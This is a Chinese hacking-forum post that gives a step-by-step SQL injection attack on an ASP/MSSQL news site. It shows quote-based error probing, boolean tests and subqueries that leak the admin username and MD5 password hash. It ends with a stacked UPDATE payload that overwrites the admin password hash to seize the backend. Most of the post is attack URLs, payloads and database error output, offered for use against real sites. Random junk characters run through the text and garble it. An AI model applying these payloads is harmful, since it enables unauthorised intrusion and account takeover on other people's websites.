经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
+ g9 p/ W6 N' N5 X: }可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL); w8 I' I* U6 E
测试如下:7 m5 Y; l% F i: L: u$ `1 _6 F
http://www.tmdsb.com/news.asp?id=121
6 J4 V7 \+ b3 W) E在地址后输入单引号,显示% i2 v, y6 w& g0 i8 S9 \. L
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’% }+ l' j6 u, P/ y0 P8 z# Q( a- Y
字符串 ’’’ 之前有未闭合的引号2 i$ R W' O6 n3 | \6 K4 s
/news/tmdws.asp,行63
7 u( X# z3 _' }' J- W说明没有过滤单引号且数据库是MSSQL.3 S1 l/ A/ V5 C* p
and 1=1正常。and 1=2出错。肯定存在注入( m) V( f s1 w: y) M
接着输入
/ Q9 N4 }/ [& S& v3 Jhttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
6 S- }2 W; K# g5 N" y% ?得到帐号为:admin
6 z2 \% P% G* D# Hhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)7 `+ ?( Y" } m4 y
得到密码为:a4716077c2ba075c
% }, [/ g, Z; h& W$ r6 H5 {接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433& K- S) t+ e1 V
命令如下 :' g' h1 s7 O$ c2 V8 J2 I
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
+ I" z( C% {0 i" t! O1 d# s这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41